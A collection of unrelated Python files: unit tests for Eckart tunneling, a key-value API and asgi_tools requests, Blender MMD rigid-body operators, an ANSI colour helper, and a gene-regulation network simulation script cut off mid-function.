    def test_E0_reac(self):
        """
        Test that the Eckart E0_reac property was properly set.
        """
        # value_si is in J/mol; *0.001 converts back to kJ/mol.
        self.assertAlmostEqual(self.tunneling.E0_reac.value_si*0.001, self.E0_reac, 4)
    def test_E0_TS(self):
        """
        Test that the Eckart E0_TS property was properly set.
        """
        self.assertAlmostEqual(self.tunneling.E0_TS.value_si*0.001, self.E0_TS, 4)
    def test_E0_prod(self):
        """
        Test that the Eckart E0_prod property was properly set.
        """
        self.assertAlmostEqual(self.tunneling.E0_prod.value_si*0.001, self.E0_prod, 4)
    def test_calculateTunnelingFactor(self):
        """
        Test the Eckart.calculateTunnelingFactor() method.
        """
        # Temperatures (K) and expected correction factors; note the huge
        # low-temperature factor characteristic of Eckart tunneling.
        Tlist = numpy.array([300,500,1000,1500,2000])
        kexplist = numpy.array([1623051., 7.69349, 1.46551, 1.18111, 1.09858])
        for T, kexp in zip(Tlist, kexplist):
            kact = self.tunneling.calculateTunnelingFactor(T)
            # Relative tolerance, since kexp spans six orders of magnitude.
            self.assertAlmostEqual(kexp, kact, delta=1e-3*kexp)
    def test_pickle(self):
        """
        Test that an Eckart object can be successfully pickled and
        unpickled with no loss of information.
        """
        import cPickle
        tunneling = cPickle.loads(cPickle.dumps(self.tunneling))
        self.assertAlmostEqual(self.tunneling.frequency.value, tunneling.frequency.value, 2)
        self.assertEqual(self.tunneling.frequency.units, tunneling.frequency.units)
        self.assertAlmostEqual(self.tunneling.E0_reac.value, tunneling.E0_reac.value, 3)
        self.assertEqual(self.tunneling.E0_reac.units, tunneling.E0_reac.units)
        self.assertAlmostEqual(self.tunneling.E0_TS.value, tunneling.E0_TS.value, 3)
        self.assertEqual(self.tunneling.E0_TS.units, tunneling.E0_TS.units)
        self.assertAlmostEqual(self.tunneling.E0_prod.value, tunneling.E0_prod.value, 3)
        self.assertEqual(self.tunneling.E0_prod.units, tunneling.E0_prod.units)
    def test_repr(self):
        """
        Test that an Eckart object can be successfully reconstructed
        from its repr() output with no loss of information.
        """
        # NOTE(review): rebinding a local via exec() only works on Python 2.
        tunneling = None
        exec('tunneling = {0!r}'.format(self.tunneling))
        self.assertAlmostEqual(self.tunneling.frequency.value, tunneling.frequency.value, 2)
        self.assertEqual(self.tunneling.frequency.units, tunneling.frequency.units)
        self.assertAlmostEqual(self.tunneling.E0_reac.value, tunneling.E0_reac.value, 3)
        self.assertEqual(self.tunneling.E0_reac.units, tunneling.E0_reac.units)
        self.assertAlmostEqual(self.tunneling.E0_TS.value, tunneling.E0_TS.value, 3)
        self.assertEqual(self.tunneling.E0_TS.units, tunneling.E0_TS.units)
        self.assertAlmostEqual(self.tunneling.E0_prod.value, tunneling.E0_prod.value, 3)
        self.assertEqual(self.tunneling.E0_prod.units, tunneling.E0_prod.units)
|
import kvapp_pkg.KVServer as kvs
import pytest
pytest.token = None
def test_auth():
    """The auth endpoint must hand back a string token."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.get('/api/auth')
        body = resp.get_json()
        assert resp.status_code == 200
        assert 'token' in body
        # Stash the token for the tests that need authentication.
        pytest.token = body['token']
        assert isinstance(pytest.token, str)
def test_insert_NOK_missing_token():
    """Insert without any token header is rejected."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.post('/api/insert', json={'key': 'kulcs', 'value': 'érték'})
        assert resp.status_code == 400
        assert resp.get_json()['msg'] == 'token is missing'
def test_insert_NOK_missing_token_2():
    """Insert with an empty token header is treated as missing."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.post('/api/insert', json={'key': 'kulcs', 'value': 'érték'},
                           headers={'x-access-tokens': ''})
        assert resp.status_code == 400
        assert resp.get_json()['msg'] == 'token is missing'
def test_insert_NOK_invalid_token():
    """Insert with a bogus token is rejected as invalid."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.post('/api/insert', json={'key': 'kulcs', 'value': 'érték'},
                           headers={'x-access-tokens': '<PASSWORD>'})
        assert resp.status_code == 400
        assert resp.get_json()['msg'] == 'token is invalid'
def test_insert_NOK_undef_params():
    """Insert with an unexpected extra parameter is rejected."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.post('/api/insert',
                           json={'key': 'kulcs', 'value': 'érték', 'extra': 'extra'},
                           headers={'x-access-tokens': pytest.token})
        assert resp.status_code == 400
        assert resp.get_json()['msg'] == 'undefined parameter settings'
def test_insert_OK():
    """A valid, authenticated insert echoes the stored pair with 201."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.post('/api/insert', json={'key': 'kulcs', 'value': 'érték'},
                           headers={'x-access-tokens': pytest.token})
        assert resp.status_code == 201
        assert resp.get_json() == {'key': 'kulcs', 'value': 'érték'}
def test_search_by_key_NOK_missing_token():
    """Key search without any token header is rejected."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.get('/api/search', json={'key': 'kulcs'})
        assert resp.status_code == 400
        assert resp.get_json()['msg'] == 'token is missing'
def test_search_by_key_NOK_missing_token_2():
    """Key search with an empty token header is treated as missing."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.get('/api/search', json={'key': 'kulcs'},
                          headers={'x-access-tokens': ''})
        assert resp.status_code == 400
        assert resp.get_json()['msg'] == 'token is missing'
def test_search_by_key_NOK_invalid_token():
    """Key search with a bogus token is rejected as invalid."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.get('/api/search', json={'key': 'kulcs'},
                          headers={'x-access-tokens': '<PASSWORD>'})
        assert resp.status_code == 400
        assert resp.get_json()['msg'] == 'token is invalid'
def test_search_by_key_NOK_undef_params():
    """Key search with an unknown extra parameter is rejected."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.get('/api/search', json={'key': 'kulcs', 'ismeretlen': 'ism'},
                          headers={'x-access-tokens': pytest.token})
        assert resp.status_code == 400
        assert resp.get_json()['msg'] == 'undefined parameter settings'
def test_search_by_key_OK_no_result():
    """Searching for an unknown key yields 204 and an empty body."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.get('/api/search', json={'key': 'kulcsa'},
                          headers={'x-access-tokens': pytest.token})
        assert resp.status_code == 204
        assert resp.get_json() is None
def test_search_by_key_OK():
    """Searching for a stored key returns the key/value pair."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.get('/api/search', json={'key': 'kulcs'},
                          headers={'x-access-tokens': pytest.token})
        assert resp.status_code == 200
        assert resp.get_json() == {'key': 'kulcs', 'value': 'érték'}
# test_search_by_prefix OK, NOK
def test_search_by_prefix_NOK_missing_token():
    """Prefix search without any token header is rejected."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.get('/api/search', json={'prefix': 'ért'})
        assert resp.status_code == 400
        assert resp.get_json()['msg'] == 'token is missing'
def test_search_by_prefix_NOK_missing_token_2():
    """Prefix search with an empty token header is treated as missing."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.get('/api/search', json={'prefix': 'ért'},
                          headers={'x-access-tokens': ''})
        assert resp.status_code == 400
        assert resp.get_json()['msg'] == 'token is missing'
def test_search_by_prefix_NOK_invalid_token():
    """Prefix search with a bogus token is rejected as invalid."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.get('/api/search', json={'prefix': 'ért'},
                          headers={'x-access-tokens': 'ross<PASSWORD>'})
        assert resp.status_code == 400
        assert resp.get_json()['msg'] == 'token is invalid'
def test_search_by_prefix_NOK_undef_params():
    """Prefix search with an unknown extra parameter is rejected."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.get('/api/search', json={'prefix': 'ért', 'ismeretlen': 'ism'},
                          headers={'x-access-tokens': pytest.token})
        assert resp.status_code == 400
        assert resp.get_json()['msg'] == 'undefined parameter settings'
def test_search_by_prefix_OK_no_result():
    """Prefix search with no matching values yields 204 and an empty body."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.get('/api/search', json={'prefix': 'nincs'},
                          headers={'x-access-tokens': pytest.token})
        assert resp.status_code == 204
        assert resp.get_json() is None
def test_search_by_prefix_OK():
    """Prefix search returns every stored pair whose value matches."""
    app = kvs.KVServer().get_app()
    with app.test_client() as client:
        resp = client.get('/api/search', json={'prefix': 'ért'},
                          headers={'x-access-tokens': pytest.token})
        assert resp.status_code == 200
        assert resp.get_json() == {'prefix': 'ért',
                                   'result': [{'key': 'kulcs', 'value': 'érték'}]}
<reponame>lsr123/PX4-loacl_code
# -*- coding: utf-8 -*-
import bpy
import mathutils
from bpy.types import Operator
import mmd_tools.core.model as mmd_model
from mmd_tools.core import rigid_body
from mmd_tools import utils
class AddRigidBody(Operator):
    """Operator that creates an MMD rigid body attached to the active bone.

    Shows a properties dialog (see ``invoke``) and then builds the rigid
    body via the model's ``createRigidBody`` helper with default physics
    parameters.
    """
    bl_idname = 'mmd_tools.add_rigid_body'
    bl_label = 'Add Rigid Body'
    bl_description = 'Adds a Rigid Body'
    bl_options = {'PRESET'}
    # Japanese and English display names of the new rigid body.
    name_j = bpy.props.StringProperty(name='Name', default='Rigid')
    name_e = bpy.props.StringProperty(name='Name(Eng)', default='Rigid_e')
    rigid_type = bpy.props.EnumProperty(
        name='Rigid Type',
        items = [
            (str(rigid_body.MODE_STATIC), 'Static', '', 1),
            (str(rigid_body.MODE_DYNAMIC), 'Dynamic', '', 2),
            (str(rigid_body.MODE_DYNAMIC_BONE), 'Dynamic&BoneTrack', '', 3),
            ],
        )
    rigid_shape = bpy.props.EnumProperty(
        name='Shape',
        items = [
            ('SPHERE', 'Sphere', '', 1),
            ('BOX', 'Box', '', 2),
            ('CAPSULE', 'Capsule', '', 3),
            ],
        )
    def execute(self, context):
        obj = context.active_object
        root = mmd_model.Model.findRoot(obj)
        rig = mmd_model.Model(root)
        mmd_root = rig.rootObject().mmd_root
        # Maps the rigid_shape enum string back to its integer shape_type.
        rigid_shape_list = ['SPHERE', 'BOX', 'CAPSULE']
        arm = rig.armature()
        # Anchor location/bone: prefer the active pose bone, then the active
        # edit bone, then the armature's first pose bone.
        loc = (0.0, 0.0, 0.0)
        rot = (0.0, 0.0, 0.0)
        bone = None
        if context.active_pose_bone is not None:
            loc = context.active_pose_bone.location
            bone = context.active_pose_bone.name
        elif context.active_bone is not None:
            loc = context.active_bone.head
            bone = context.active_bone.name
        elif arm is not None and len(arm.pose.bones) > 0:
            loc = arm.pose.bones[0].location
            bone = arm.pose.bones[0].name
        bpy.ops.object.mode_set(mode='OBJECT')
        rigid = rig.createRigidBody(
                name = self.name_j,
                name_e = self.name_e,
                shape_type = rigid_shape_list.index(self.rigid_shape),
                dynamics_type = int(self.rigid_type),
                location = loc,
                rotation = rot,
                size = mathutils.Vector([2, 2, 2]) * mmd_root.scale,
                collision_group_number = 0,
                collision_group_mask = [False for i in range(16)],
                arm_obj = arm,
                mass=1,
                friction = 0.0,
                angular_damping = 0.5,
                linear_damping = 0.5,
                bounce = 0.5,
                bone = bone,
                )
        # Honor the model's rigid-body visibility toggle; keep the previous
        # selection when the new body stays hidden.
        if mmd_root.show_rigid_bodies:
            rigid.hide = False
            utils.selectAObject(rigid)
        else:
            rigid.hide = True
            utils.selectAObject(obj)
        if 'mmd_tools.'+mmd_root.name+'_all' in bpy.data.groups.keys(): # Add Rigid to allObjectsGroup
            bpy.data.groups['mmd_tools.'+mmd_root.name+'_all'].objects.link(rigid)
        if 'mmd_tools.'+mmd_root.name+'_rigids' in bpy.data.groups.keys(): # Add Rigid to RigidsGroup
            bpy.data.groups['mmd_tools.'+mmd_root.name+'_rigids'].objects.link(rigid)
        return { 'FINISHED' }
    def invoke(self, context, event):
        # Pop up the property dialog before running execute().
        vm = context.window_manager
        return vm.invoke_props_dialog(self)
class RemoveRigidBody(Operator):
    """Delete the currently selected rigid body object."""
    bl_idname = 'mmd_tools.remove_rigid_body'
    bl_label = 'Remove Rigid Body'
    bl_description = 'Deletes the currently selected Rigid Body'
    bl_options = {'PRESET'}

    def execute(self, context):
        active = context.active_object
        # Refuse to run on anything that is not a rigid body.
        if active.mmd_type != 'RIGID_BODY':
            self.report({'ERROR'}, "Select the Rigid Body to be deleted")
            return {'CANCELLED'}
        # Make sure only the rigid body is selected before deleting.
        utils.selectAObject(active)
        bpy.ops.object.delete(use_global=True)
        return {'FINISHED'}
class AddJoint(Operator):
    """Add a default physics joint object to the active MMD model."""
    bl_idname = 'mmd_tools.add_joint'
    bl_label = 'Add Joint'
    bl_options = {'PRESET'}

    def execute(self, context):
        obj = context.active_object
        root = mmd_model.Model.findRoot(obj)
        rig = mmd_model.Model(root)
        mmd_root = rig.rootObject().mmd_root
        # Create a joint with neutral transform and zeroed limits/springs.
        joint = rig.createJoint(
            name = 'Joint',
            name_e = 'Joint_e',
            location = [0, 0, 0],
            rotation = [0, 0, 0],
            size = 0.5 * mmd_root.scale,
            rigid_a = None,
            rigid_b = None,
            maximum_location = [0, 0, 0],
            minimum_location = [0, 0, 0],
            maximum_rotation = [0, 0, 0],
            minimum_rotation = [0, 0, 0],
            spring_linear = [0, 0, 0],
            spring_angular = [0, 0, 0],
            )
        # Honor the model's visibility toggle; select the new joint when shown.
        if mmd_root.show_joints:
            joint.hide = False
            utils.selectAObject(joint)
        else:
            joint.hide = True
            utils.selectAObject(obj)
        # BUG FIX: objects are linked through a Group's `.objects` collection
        # (as AddRigidBody does above); `Group.link` does not exist and raised
        # AttributeError at runtime.
        if 'mmd_tools.'+mmd_root.name+'_all' in bpy.data.groups.keys(): # Add Joint to allGroup
            bpy.data.groups['mmd_tools.'+mmd_root.name+'_all'].objects.link(joint)
        if 'mmd_tools.'+mmd_root.name+'_joints' in bpy.data.groups.keys(): # Add Joint to joints group
            bpy.data.groups['mmd_tools.'+mmd_root.name+'_joints'].objects.link(joint)
        return { 'FINISHED' }
class RemoveJoint(Operator):
    """Delete the currently selected joint object."""
    bl_idname = 'mmd_tools.remove_joint'
    bl_label = 'Remove Joint'
    bl_description = 'Deletes the currently selected Joint'
    bl_options = {'PRESET'}

    def execute(self, context):
        active = context.active_object
        # Refuse to run on anything that is not a joint.
        if active.mmd_type != 'JOINT':
            self.report({'ERROR'}, "Select the Joint to be deleted")
            return {'CANCELLED'}
        # Make sure only the joint is selected before deleting.
        utils.selectAObject(active)
        bpy.ops.object.delete(use_global=True)
        return {'FINISHED'}
<filename>tests/test_request.py<gh_stars>10-100
"""Test Request."""
import pytest
from copy import copy
async def test_request():
    """Exercise the lazy Request wrapper over a hand-built HTTP scope."""
    from asgi_tools import Request
    # Request is lazy
    request = Request({}, None)
    assert request is not None
    # Minimal but realistic ASGI HTTP scope.
    scope = {
        'type': 'http',
        'asgi': {'version': '3.0'},
        'http_version': '1.1',
        'method': 'GET',
        'headers': [
            (b'host', b'testserver:8000'),
            (b'accept', b'*/*'),
            (b'accept-encoding', b'gzip, deflate'),
            (b'connection', b'keep-alive'),
            (b'content-type', b'application/x-www-form-urlencoded'),
            (b'user-agent', b'python-httpx/0.16.1'),
            (b'test-header', b'test-value'),
            (b'cookie', b'session=test-session'),
        ],
        'scheme': 'http',
        'path': '/testurl',
        'query_string': b'a=1%202',
        'server': ('testserver', 8000),
        'client': ('127.0.0.1', 123),
        'root_path': ''
    }
    async def receive():
        # Single-message body: urlencoded form data.
        return {'body': b'name=test%20passed'}
    request = Request(scope, receive)
    # Scope-derived attributes.
    assert request.method == 'GET'
    assert request.headers
    assert request.headers['User-Agent'] == 'python-httpx/0.16.1'
    assert request.url
    assert str(request.url) == 'http://testserver:8000/testurl?a=1%202'
    assert request.client == ('127.0.0.1', 123)
    assert request.cookies
    assert request.cookies['session'] == 'test-session'
    assert request.http_version == '1.1'
    assert request.type == 'http'
    assert request['type'] == 'http'
    # Body parsing consumes the receive channel.
    formdata = await request.form()
    assert formdata
    assert formdata['name'] == 'test passed'
    # Reading the body again after the form was consumed must fail.
    with pytest.raises(RuntimeError):
        body = await request.body()
        assert body
    # Copying yields a distinct request object.
    r2 = copy(request)
    assert r2 is not request
async def test_multipart(Client):
    """Multipart uploads are parsed into file-like form values."""
    from asgi_tools import Request, ResponseHTML
    async def app(scope, receive, send):
        # Echo the first line of the uploaded file back as HTML.
        request = Request(scope, receive)
        data = await request.form()
        response = ResponseHTML(
            data['test'].read().decode().split('\n')[0]
        )
        return await response(scope, receive, send)
    client = Client(app)
    # Upload this very test file; its first line is the module docstring.
    res = await client.post('/', data={'test': open(__file__)})
    assert res.status_code == 200
    assert await res.text() == '"""Test Request."""'
    assert res.headers['content-length'] == str(len('"""Test Request."""'))
async def test_media(GenRequest):
    """Content-type parsing exposes media params and the bare content type."""
    req = GenRequest()
    # With no content-type header, media info exists but content_type is empty.
    assert req.media
    assert req.content_type == ''
    req = GenRequest(headers={'content-type': 'text/html; charset=iso-8859-1'})
    # Parameters (charset) are split out from the bare content type.
    assert req.media
    assert req.media['charset']
    assert req.media['content_type']
    assert req.content_type == 'text/html'
async def test_json(GenRequest):
    """`Request.json` raises ASGIError on malformed bodies and parses valid JSON."""
    from asgi_tools import ASGIError
    req = GenRequest(body=[b'invalid'])
    try:
        await req.json()
    except ASGIError as exc:
        assert exc.args[0] == 'Invalid JSON'
    else:
        # BUG FIX: without this the test silently passed when json() did NOT
        # raise for invalid input, which is exactly the regression it guards.
        raise AssertionError('ASGIError was not raised for invalid JSON')
    # Valid body parses into a dict.
    req = GenRequest(body=[b'{"test": 42}'])
    json = await req.json()
    assert json == {'test': 42}
async def test_data(Client, GenRequest):
    """`Request.data` dispatches to form/json/text parsing by content type."""
    from asgi_tools import ResponseMiddleware, Request
    async def app(scope, receive, send):
        # Return parsed data as-is for str/bytes, otherwise as a plain dict.
        request = Request(scope, receive)
        data = await request.data()
        return isinstance(data, (str, bytes)) and data or dict(data)
    app = ResponseMiddleware(app)
    client = Client(app)
    # Post formdata
    res = await client.post('/', data={'test': 'passed'})
    assert res.status_code == 200
    assert await res.json() == {'test': 'passed'}
    # Post json
    res = await client.post('/', json={'test': 'passed'})
    assert res.status_code == 200
    assert await res.json() == {'test': 'passed'}
    # Post other
    res = await client.post('/', data='test passed')
    assert res.status_code == 200
    assert await res.text() == 'test passed'
    # Invalid data
    res = await client.post('/', data='invalid', headers={'content-type': 'application/json'})
    assert res.status_code == 200
    assert await res.text() == 'invalid'
    req = GenRequest(body=[b'invalid'], headers={'content-type': 'application/json'})
    # BUG FIX: the original evaluated this comparison and discarded the result;
    # it must be asserted to actually test the lenient-parse fallback.
    assert await req.data() == 'invalid'
    # In strict mode, invalid JSON raises.
    with pytest.raises(ValueError):
        await req.data(True)
|
<filename>MyShell/COLOR.py
class COLOR:
    """ANSI terminal styling helpers.

    Each method wraps *string* in an ANSI SGR escape sequence followed by a
    reset, bracketed with \\x01/\\x02 (readline's non-printing markers) so
    prompt-width calculations stay correct.
    """

    @staticmethod
    def _wrap(code, string):
        """Return *string* wrapped in the SGR sequence for *code* plus a reset.

        Single shared template replacing 40 hand-copied f-strings; output is
        byte-identical to the originals.
        """
        return f'\1\33[{code}m{string}\33[0m\2'

    # --- text attributes ---
    @staticmethod
    def BOLD(string): return COLOR._wrap(1, string)
    @staticmethod
    def ITALIC(string): return COLOR._wrap(3, string)
    @staticmethod
    def URL(string): return COLOR._wrap(4, string)
    @staticmethod
    def BLINK(string): return COLOR._wrap(5, string)
    @staticmethod
    def BLINK2(string): return COLOR._wrap(6, string)
    @staticmethod
    def SELECTED(string): return COLOR._wrap(7, string)

    # --- standard foreground colors (30-37) ---
    @staticmethod
    def BLACK(string): return COLOR._wrap(30, string)
    @staticmethod
    def RED(string): return COLOR._wrap(31, string)
    @staticmethod
    def GREEN(string): return COLOR._wrap(32, string)
    @staticmethod
    def YELLOW(string): return COLOR._wrap(33, string)
    @staticmethod
    def BLUE(string): return COLOR._wrap(34, string)
    @staticmethod
    def VIOLET(string): return COLOR._wrap(35, string)
    @staticmethod
    def BEIGE(string): return COLOR._wrap(36, string)
    @staticmethod
    def WHITE(string): return COLOR._wrap(37, string)

    # --- standard background colors (40-47) ---
    @staticmethod
    def BLACKBG(string): return COLOR._wrap(40, string)
    @staticmethod
    def REDBG(string): return COLOR._wrap(41, string)
    @staticmethod
    def GREENBG(string): return COLOR._wrap(42, string)
    @staticmethod
    def YELLOWBG(string): return COLOR._wrap(43, string)
    @staticmethod
    def BLUEBG(string): return COLOR._wrap(44, string)
    @staticmethod
    def VIOLETBG(string): return COLOR._wrap(45, string)
    @staticmethod
    def BEIGEBG(string): return COLOR._wrap(46, string)
    @staticmethod
    def WHITEBG(string): return COLOR._wrap(47, string)

    # --- bright foreground colors (90-97) ---
    @staticmethod
    def GREY(string): return COLOR._wrap(90, string)
    @staticmethod
    def RED2(string): return COLOR._wrap(91, string)
    @staticmethod
    def GREEN2(string): return COLOR._wrap(92, string)
    @staticmethod
    def YELLOW2(string): return COLOR._wrap(93, string)
    @staticmethod
    def BLUE2(string): return COLOR._wrap(94, string)
    @staticmethod
    def VIOLET2(string): return COLOR._wrap(95, string)
    @staticmethod
    def BEIGE2(string): return COLOR._wrap(96, string)
    @staticmethod
    def WHITE2(string): return COLOR._wrap(97, string)

    # --- bright background colors (100-107) ---
    @staticmethod
    def GREYBG(string): return COLOR._wrap(100, string)
    @staticmethod
    def REDBG2(string): return COLOR._wrap(101, string)
    @staticmethod
    def GREENBG2(string): return COLOR._wrap(102, string)
    @staticmethod
    def YELLOWBG2(string): return COLOR._wrap(103, string)
    @staticmethod
    def BLUEBG2(string): return COLOR._wrap(104, string)
    @staticmethod
    def VIOLETBG2(string): return COLOR._wrap(105, string)
    @staticmethod
    def BEIGEBG2(string): return COLOR._wrap(106, string)
    @staticmethod
    def WHITEBG2(string): return COLOR._wrap(107, string)
|
<filename>section_5/power.py<gh_stars>0
import numpy as np
import networkx as nx
from networkx.algorithms import bipartite
import itertools
import warnings
import scipy
import random
import argparse
import pickle
from functools import lru_cache
import sys
from multiprocessing import Pool
import os
sys.path.insert(0, "../lib") # add the library folder to the path I look for modules
from dynamical_cavity import cavity_AND_parallel
from configurational_model_regulatory import mirroring
def directory(gamma_G, gamma_TF):
    """Return the per-parameter output directory for a (gamma_G, gamma_TF) pair."""
    base = '.' + os.path.dirname(__file__)
    return f'{base}/gamma_G_{gamma_G}gamma_TF_{gamma_TF}'
def save_obj(obj, gamma_G, gamma_TF, theta):
    """Pickle *obj* under the parameter directory's data/ folder.

    The file is named after *theta*; on a name collision a timestamp suffix is
    appended so existing results are never overwritten.
    """
    import time  # only needed for the collision branch; was missing entirely

    directory_ = directory(gamma_G, gamma_TF)
    # BUG FIX: the original tested `directory + "/data"`, concatenating the
    # *function object* itself (TypeError at runtime); use the path string.
    if not os.path.exists(directory_ + "/data"):
        os.makedirs(directory_ + "/data")
    name = "theta_" + str(theta) + '.pkl'
    if os.path.isfile(directory_ + '/data/dic-' + name):
        # Avoid clobbering an existing result: append a unique timestamp.
        name = name[:-4] + '_' + str(time.time()) + '.pkl'
    with open(directory_ + '/data/dic-' + name, 'wb') as f:
        pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def create_graph( N1,N2,gamma_G,gamma_TF,bias= 0.5):
    '''Generate graph according with power law distribution, in-degree sequence of genes and out-degree sequence of TFs are the same'''
    def generate_degree_seq(gamma, N):
        # Pareto-distributed degrees, rounded up; resample any entry > N so
        # every degree is realizable among N nodes.
        kseq = np.ceil(np.random.pareto(gamma, N))
        cond = kseq > N
        while any(cond):
            temp_seq = np.ceil(np.random.pareto(gamma, np.count_nonzero(cond)))
            kseq[cond] = temp_seq
            cond = kseq > N
        return np.array(kseq, dtype=int)
    # Degree sequences for genes (aseq) and transcription factors (bseq).
    aseq = generate_degree_seq(gamma_G, N1)
    bseq = generate_degree_seq(gamma_TF, N2)
    if sum(bseq) < N1:
        raise ValueError('degree sequence non compatible for regulations')
    # generate the graph
    BG = mirroring(aseq, bseq, nx.MultiDiGraph())
    M = bipartite.biadjacency_matrix(BG, range(N1)) # membership matrix
    R = bipartite.biadjacency_matrix(BG, range(N1, N1 + N2), format="csc") # regulatory matrix
    avg_degree = len(R.data) / N1
    # Random activator/repressor signs, normalized by sqrt(mean degree).
    sign_interaction = np.where(np.random.rand(R.nnz) > bias, 1, -1) # bias in sign of regulation
    R.data = np.ravel(sign_interaction)/ np.sqrt(avg_degree)
    return M,R
def replics_parallel(R,M, P_init, T, N_replics,N_iterations):
    '''Simulation at fixed T for different replicas
    Initial condition is chosen to be the same as for cavity. I am not using here, but they may be useful if one wants to check cavity against simulations'''
    # One worker per replica; replicas differ only by the seed (their index).
    pool = Pool()
    N1,N2 = M.shape
    # Per-gene lists of incoming interaction weights (CSR row slices of R).
    interaction = [R.data[R.indptr[i]:R.indptr[i + 1]] for i in range(N1)] # list of list, structure is [el[i]]
    #interaction_sum = np.sum(interaction, axis=1)
    theta = 0 #interaction_sum / 2
    data = pool.starmap(dynamics_light_parallel, itertools.product([R],[M] ,[P_init], [T], [theta], range(N_replics), [N_iterations]))
    # for replica in range(N_replic):
    #     data+=[dynamics_light(J,psi_init,T)]
    # NOTE(review): the pool is closed but never joined before returning —
    # confirm whether pool.join() should follow here.
    pool.close()
    return data
def dynamics_light_parallel(R, M, P_init, T, theta, process, N_iterations):
    """Run one replica of the noisy AND-gate dynamics and return the
    time-averaged activation of each gene.

    Args:
        R: (N2 x N1) sparse regulatory matrix (TF -> gene weights).
        M: (N1 x N2) sparse membership matrix (gene -> TF).
        P_init: probability threshold for the random initial gene state.
        T: noise amplitude of the logistic thermal noise.
        theta: activation threshold.
        process: replica index, used as the RNG seed for reproducibility.
        N_iterations: number of measured sweeps after thermalization.

    Returns:
        np.ndarray of shape (N1,): per-gene activation frequency.
    """
    # BUG FIX: the original referred to `numpy.random` although the module is
    # imported as `np` (NameError at runtime), and seeded only the stdlib
    # `random` module while all samples came from NumPy's (unseeded) generator.
    # Seed both so each replica is reproducible.
    random.seed(process)
    np.random.seed(process)
    N1, N2 = M.shape
    N_therm = 100  # thermalization sweeps before measuring
    n_start = np.where(np.random.rand(N1) > P_init, 1, 0)
    n = scipy.sparse.csr_matrix(n_start)
    M = M.tocsc()
    in_deg = np.diff(M.indptr)  # in degree of each TF
    t = 1
    while t < N_therm:
        # AND logic: a TF is on only if *all* its member genes are on.
        tau = np.where((n * M).toarray() != in_deg, 0, 1)
        z = np.random.logistic(0, T, (1, N1))  # logistic thermal noise
        n = scipy.sparse.csr_matrix(tau) * R
        n = np.where(n.toarray() - z - theta > 0, 1, 0)
        n = scipy.sparse.csr_matrix(n)
        t += 1
    t = 0
    m = np.zeros(N1)
    # Measurement phase: same update rule, accumulating per-gene activations.
    while t < N_iterations:
        tau = np.where((n * M).toarray() != in_deg, 0, 1)
        z = np.random.logistic(0, T, (1, N1))
        n = scipy.sparse.csr_matrix(tau) * R
        n = np.where(n.toarray() - z - theta > 0, 1, 0)
        m += n[0]
        n = scipy.sparse.csr_matrix(n)
        t += 1
    return m / N_iterations
def load_input(args):
    """Unpack the parsed CLI namespace into (N1, N2, gamma_G, gamma_TF)."""
    # N1/N2: numbers of genes and TFs; gammas: degree-distribution exponents.
    return args.N1, args.N2, args.gamma_G, args.gamma_TF
def load_obj(gamma_G, gamma_TF, name):
    """Unpickle and return the object stored for this parameter pair."""
    path = directory(gamma_G, gamma_TF) + '/dic-' + name + '.pkl'
    with open(path, 'rb') as f:
        obj = pickle.load(f)
    # BUG FIX: this message was placed after the `return` and never executed.
    print("Couplings loaded from" + path)
    return obj
def main():
    """CLI entry point: build or load the bipartite regulatory graph, sweep the
    noise parameter T through the cavity computation, and pickle the results."""
    parser = argparse.ArgumentParser(
        description='Probability of node activtion for the multi-node interaction model defined on a bipartite graphs (see paper) \n'
        'Returns:\n'
        'a dictionary containing the topology "J", and the activation probability "data". \n'
        '"J" is a scipy.sparse matrix.\n'
        '"data" is a 2d list containing single node activation probabilities at different noise parameters T.\n'
        'Output is saved in /data/ folder with unique identifier. Simulation for different values of T are run in parallel. By default, code runs on all cores available on your machine.',
        formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument("-N1", help="Number of genes", type=int, const=200000, default=200000, nargs='?')
    parser.add_argument("-N2", help="Number of TFs", type=int, const=200000, default=200000, nargs='?')
    #parser.add_argument("-N2", help="Number of TF", type=int, const=1000, default=1000, nargs='?')
    parser.add_argument('--gamma_G', type=float, default=1.81, help=" gamma in degree of genes. Default set to 3")
    parser.add_argument('--gamma_TF', type=float, default=1.81, help="gamma in degree of TFs. Default set to 4")
    parser.add_argument('--nprocess', type=int, const=-1, default=-1, nargs='?', help="number of processes run in parallel, i.e. number of cores to be used in your local machine. Default all cores available")
    parser.add_argument('--create_graph', help='Create a new graph and does not load ', action='store_true')
    args = parser.parse_args()
    N1, N2, gamma_G, gamma_TF = load_input(args)
    threads = args.nprocess
    bias = 0.379  # probability bias toward repressive (negative) regulation
    if not args.create_graph:
        # Default path: reuse a previously saved topology if one exists.
        try:
            dic = load_obj(gamma_G, gamma_TF, "couplings")
            print("I am loading the graph from dictionary")
            gamma_G = dic["gamma_G"]
            gamma_TF = dic["gamma_TF"]
            N1 = dic["N1"]
            N2 = dic["N2"]
            R = dic["R"]
            M = dic["M"]
        except FileNotFoundError:
            print('I did not find the topology file in "gamma_G:'+str(gamma_G)+'gamma_TF:'+str(gamma_TF)+'/dic-couplings.pkl')
            # Interactively offer to build and persist a fresh topology.
            while True:
                answer = input("Do you want to create a new graph? Type y for yes, or q to quit\n")
                if answer == "q":
                    return 1
                elif answer == "y":
                    M, R = create_graph(N1, N2, gamma_G, gamma_TF, bias)
                    directory_ = directory(gamma_G, gamma_TF)
                    if not os.path.exists(directory_):
